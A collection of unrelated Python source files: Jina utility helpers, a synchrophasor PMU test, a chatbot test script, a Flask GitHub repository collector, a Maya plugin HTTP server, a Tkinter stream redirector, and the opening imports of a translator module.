if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
if 'JINA_DISABLE_UVLOOP' in os.environ:
return
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
Set :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
test_server_collect.py
|
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '../'))
from synchrophasor.frame import *
from synchrophasor.pmu import Pmu
from synchrophasor.pmuGen import *
from time import sleep
import threading
SLEEP_TIME = 1.0/100
def test_client_single_pmu():
pmu = create_pmu(9006)
pmu.ieee_data_sample.set_freq(1)
cnt = 0
while True:
sleep(SLEEP_TIME)
if pmu.clients:
pmu.send(pmu.ieee_data_sample)
pmu.join()
def test_client_2_pmus():
pmus = [create_pmu(port) for port in [9007, 9008]]
for i, pmu in enumerate(pmus):
pmu.ieee_data_sample.set_freq(i+1)
cnt = 0
while True:
sleep(SLEEP_TIME)
for pmu in pmus:
pmu.send(pmu.ieee_data_sample)
for pmu in pmus:
pmu.join()
def test_client_10_pmus():
nSources = 4
pmus = [create_pmu(port, log_level='DEBUG') for port in range(9009, 9009+nSources)]
# pmus = [create_pmu(port) for port in range(9009, 9009+nSources)]
for i, pmu in enumerate(pmus):
pmu.ieee_data_sample.set_freq(i+1)
cnt = 0
while True:
# sleep(SLEEP_TIME)
for pmu in pmus:
pmu.send(pmu.ieee_data_sample)
for pmu in pmus:
pmu.join()
if __name__ == "__main__":
test_list = [
# test_client_single_pmu,
# test_client_2_pmus,
test_client_10_pmus
]
threads = list()
for test in test_list:
x = threading.Thread(target=test)
threads.append(x)
x.start()
for index, thread in enumerate(threads):
thread.join()
|
test_app.py
|
import queue
import threading
from chatbot.speakeasy.app import App
# if __name__ == "__main__":
# app = App()
# while True:
# question = input("Ask:")
# threads = []
# q = queue.Queue()
# try:
# t = threading.Thread(target=app.get_response, args=(question, q,))
# t.start()
# t.join()
# response = q.get()
# print(f"A: {response}\n")
# except Exception as e:
# print("Error:", e)
questions = [
"Who is the director of the Batman movie?",
'Did Christopher Nolan ever work on a Batman movie?',
'What is the name of the lead actor in the movie Catch Me If You Can?',
'I like the Jurassic Park movie; can you recommend any similar movies?',
'I am a big fan of Steven Spielberg, could you recommend some of his action movies?',
'Show me the pictures of the lead actors of the movie Jurassic Park.',
'Can you show me the poster of the movie Batman?',
'Show me an action movie poster.',
"What's the box office of the movie E.T. the Extra-Terrestrial?"
]
app = App()
for question in questions:
threads = []
q = queue.Queue()
try:
t = threading.Thread(target=app.get_response, args=(question, q,))
t.start()
t.join()
response = q.get()
print(f"A: {response}\n")
except Exception as e:
print("Error:", e)
|
repositories.py
|
import datetime
import pandas as pd
import re
import time
import threading
from flask import make_response, send_file
from flask_restful import Resource, reqparse
from repocollector.github import GithubRepositoriesCollector
def is_ansible_dir(path: str) -> bool:
"""
Check whether the path is an Ansible directory
:param path: a path
:return: True if the path link to an Ansible directory. False, otherwise
"""
return path and ('playbooks' == path or 'meta' == path or 'tasks' == path or 'handlers' == path or 'roles' == path)
def is_ansible_repository(full_name: str, description: str, root_dirs: list) -> bool:
"""
Check if the repository has Ansible files
:param full_name: the repository full name (owner/name)
:param description: the repository's description
:param root_dirs: a list of directory names at the root of the repository
:return: True if the repository has Ansible files; False otherwise
"""
return 'ansible' in description.lower() \
or 'ansible' in full_name.lower() \
or sum([1 for path in root_dirs if is_ansible_dir(path)]) >= 2
class Repositories(Resource):
def __init__(self, **kwargs):
self.db = kwargs['db']
def get(self):
repos_df = pd.DataFrame()
repositories = self.db.collection('repositories').stream()
for repo in repositories:
repos_df = repos_df.append({
'full_name': repo.to_dict()['full_name'],
'id': repo.to_dict()['id']
}, ignore_index=True)
response = make_response(repos_df.to_csv(index=False))
response.headers["Content-Disposition"] = "attachment; filename=repositories.csv"
response.headers["Content-Type"] = "text/csv"
return response
def post(self):
""" Collect repositories from GitHub based on search criteria """
parser = reqparse.RequestParser()
parser.add_argument('token', type=str, required=True)
parser.add_argument('start', type=str, required=True)
parser.add_argument('end', type=str, required=True)
parser.add_argument('language', type=str, required=True)
parser.add_argument('pushed_after', type=str, required=True)
parser.add_argument('timedelta', type=str, required=False)
parser.add_argument('min_stars', type=int, required=False)
parser.add_argument('min_releases', type=int, required=False)
args = parser.parse_args()
# Create Task
task_id = self.db.collection('tasks').add({
'name': 'crawling',
'language': args.get('language'),
'status': 'progress',
'started_at': time.time()
})[1].id
print(task_id)
thread = threading.Thread(target=self.run_task, name="collect-repositories", args=(args, task_id))
thread.start()
return make_response({}, 202)
def run_task(self, args: dict, task_id):
status = 'progress'
# Converting Mon Oct 04 2021 00:00:00 GMT 0200 (Central European Summer Time) to Oct 04 2021
since = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', args.get('start'))[0]
until = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', args.get('end'))[0]
pushed_after = re.findall(r'(\d{4}-\d{2}-\d{2})T.+', args.get('pushed_after'))[0]
# and convert to datetime object
since = datetime.datetime.strptime(since, '%Y-%m-%d')
until = datetime.datetime.strptime(until, '%Y-%m-%d')
pushed_after = datetime.datetime.strptime(pushed_after, '%Y-%m-%d')
try:
while since <= until:
github_crawler = GithubRepositoriesCollector(
access_token=args.get('token'),
since=since,
until=since + datetime.timedelta(days=1),
pushed_after=pushed_after,
min_issues=0,
min_releases=args.get('min_releases', 0),
min_stars=args.get('min_stars', 0),
min_watchers=0,
primary_language=args.get('language') if args.get('language') not in ('ansible', 'tosca') else None
)
for repo in github_crawler.collect_repositories():
if args.get('language') == 'ansible' and not is_ansible_repository(f'{repo["owner"]}/{repo["name"]}', repo['description'], repo['dirs']):
continue
elif args.get('language') == 'tosca':
continue
else:
repo_ref = self.db.collection('repositories').document(str(repo['id']))
repo_ref.set({
'id': repo['id'],
'full_name': f'{repo["owner"]}/{repo["name"]}',
'url': repo['url'],
'default_branch': repo['default_branch']
})
since += datetime.timedelta(days=1)
status = 'completed'
except Exception as e:
status = 'failed'
print(e)
print(github_crawler.quota, github_crawler.quota_reset_at)
finally:
doc_ref = self.db.collection('tasks').document(task_id)
doc_ref.update({
'status': status,
'ended_at': time.time()
})
|
plugin.py
|
import os
import time
import threading
import json
import sys
import atexit
import logging
import BaseHTTPServer
import SocketServer
import maya.cmds
import assetexchange_shared
class ThreadingHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""Handle requests in a separate thread."""
_http_servers = dict()
def register_plugin(plugin_uid, plugin_info, AssetPushService=None, misc_services={}):
# prevent double registration
global _http_servers
if plugin_uid in _http_servers:
raise RuntimeError('add-on already registered')
# prepare logger
logger = logging.getLogger(plugin_uid)
logger.setLevel(logging.INFO)
# add console handler
if not hasattr(logger, '_has_console_handler'):
console_log = logging.StreamHandler()
console_log.setLevel(logging.DEBUG)
console_log.setFormatter(logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(console_log)
setattr(logger, '_has_console_handler', True)
# check if push service is derived properly
if AssetPushService is not None:
if not issubclass(AssetPushService, assetexchange_shared.server.AssetPushServiceInterface):
raise RuntimeError(
'AssetPushService should inherit AssetPushServiceInterface')
# setup registry
service_registry = {}
if AssetPushService is not None:
service_registry['assetninja.assetpush#1'] = AssetPushService
service_registry.update(misc_services)
service_registry = {key: val for key,
val in service_registry.items() if val is not None}
# setup http protocol handler
class HttpServerRequestHandler(assetexchange_shared.server.HttpServerRequestHandler):
# copy logger over
_logger = logger
# override logger getter
def get_logger(self):
return self._logger
# copy service registry over
_service_registry = service_registry
# override service registry getter
def get_service_registry(self):
return self._service_registry
# start http server using a free port
_http_servers[plugin_uid] = ThreadingHTTPServer(
('127.0.0.1', 0),
HttpServerRequestHandler
)
thread = threading.Thread(
target=_http_servers[plugin_uid].serve_forever)
# note: required for maya exit, otherwhise it will block (even though we have an atexit handler)
thread.setDaemon(True)
thread.start()
# retrieve port (no race condition here, as it is available right after construction)
port = _http_servers[plugin_uid].server_address[1]
logger.info("port=" + str(port))
# write registration file
regfile = assetexchange_shared.server.service_entry_path(
'extension.maya', plugin_uid)
with open(regfile, 'w') as portfile:
portfile.write(json.dumps({
'category': 'extension.maya',
'type': plugin_uid,
'pid': os.getpid(),
'port': port,
'protocols': ['basic'],
'info': {
'extension.uid': plugin_uid,
'extension.name': plugin_info['name'],
'extension.description': plugin_info['description'],
'extension.author': plugin_info['author'],
'extension.version': plugin_info['version'],
'maya.executable': sys.executable,
'maya.version': maya.cmds.about(version=True),
},
'services': list(service_registry.keys()),
}, indent=2))
def unregister_plugin(plugin_uid):
# fetch logger
logger = logging.getLogger(plugin_uid)
# try to remove registration file
regfile = assetexchange_shared.server.service_entry_path(
'extension.maya', plugin_uid)
for _ in range(5):
if os.path.exists(regfile):
try:
logger.info('trying to remove registration file')
os.remove(regfile)
except Exception:
logger.exception(
"assetninja: could not remove registration file")
time.sleep(1)
continue
else:
break
else:
break
# shutdown server
global _http_servers
if plugin_uid in _http_servers:
logger.info('shutdown http server')
_http_servers[plugin_uid].shutdown()
del _http_servers[plugin_uid]
@atexit.register
def unregister_plugins():
global _http_servers
for plugin_uid in list(_http_servers.keys()):
unregister_plugin(plugin_uid)
|
std_stream_redirector.py
|
#!/usr/bin/env python3
# Copyright (c) 2019, Alchemy Meister
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
"""
import time
import queue
import threading
class StdStreamRedirector():
"""
"""
INITIAL_SHORT_DELAY = 2
def __init__(
self, widget, widget_config, file_config=None, callback=None
):
self.widget = widget
self.tag = widget_config.get('tag')
self.auto_scroll = widget_config.get('auto_scroll', True)
self.save_to_file = False
self.file = None
if file_config:
self.file_path = file_config.get('file_path')
if self.file_path:
self.save_to_file = file_config.get('save_to_file', True)
if self.save_to_file:
self.file = open(
self.file_path,
file_config.get('write_mode', 'w'),
encoding='utf-8'
)
self.callback = callback
self.queue = queue.Queue()
self.__run_queue_checker = False
self.widget_updater = None
self.last_executed_time = None
self.delay = StdStreamRedirector.INITIAL_SHORT_DELAY
def write(self, *args):
if args:
if self.__run_queue_checker:
self.__async_write(*args)
else:
self.__sync_write(*args)
def write_file(self, file_path, callback=None):
def _read_file(file_path):
with open(file_path, 'r') as r_file:
for line in r_file:
self.queue.put(line)
self.queue.put('\n')
self.queue.put(False)
self.__run_queue_checker = True
self.__update_widget(callback=callback)
threading.Thread(target=_read_file, args=(file_path,)).start()
def flush(self):
pass
def close(self):
if self.file:
self.file.close()
def set_file_path(self, path):
self.file_path = path
def enable_save_to_file(self, enable):
self.save_to_file = enable
if enable and not self.file:
if not self.file_path:
raise Exception('save to file enabled, but file path is None')
self.file = open(self.file_path, 'w')
def enable_auto_scroll(self, enable):
self.auto_scroll = enable
def __async_write(self, *args):
def _write(args):
if len(args) == 1:
string = str(args[0])
else:
string = str(args)
if string and string[-1] != '\n':
self.queue.put(''.join([string, '\n']))
elif string:
self.queue.put(string)
threading.Thread(target=_write, args=(args,)).start()
def __sync_write(self, *args):
if len(args) == 1:
string = str(args[0])
else:
string = str(args)
if string and string[-1] != '\n':
self.__write_on_widget(''.join([string, '\n']))
elif string:
self.__write_on_widget(string)
def __write_to_file(self, string):
self.file.write(string)
self.file.flush()
def __write_on_widget(self, message):
self.widget.configure(state='normal')
self.widget.insert('end', message, (self.tag,))
self.widget.configure(state='disabled')
if self.auto_scroll:
self.widget.see('end')
if self.save_to_file:
threading.Thread(
target=self.__write_to_file,
args=(message,)
).start()
if self.callback:
self.callback(message)
def __update_widget(self, callback=None):
try:
message = self.queue.get_nowait()
if isinstance(message, str):
self.__write_on_widget(message)
self.__update_delay()
else:
self.__run_queue_checker = False
except queue.Empty:
pass
if self.__run_queue_checker:
self.widget.after(
self.delay,
lambda: self.__update_widget(callback=callback)
)
elif callback:
callback()
def __update_delay(self):
if self.last_executed_time is None:
self.last_executed_time = time.time()
else:
now = time.time()
elapsed_time = 1000 * (now - self.last_executed_time)
avg_delay = (self.delay * 0.8 + elapsed_time * 0.2) / 2
if avg_delay > StdStreamRedirector.INITIAL_SHORT_DELAY:
self.delay = int(avg_delay)
self.last_executed_time = now
|
Translator.py
|
import asyncio
import hashlib
import json
import threading
import urllib.parse
import requests
from parsimonious import ParseError, VisitationError
from pyseeyou import format
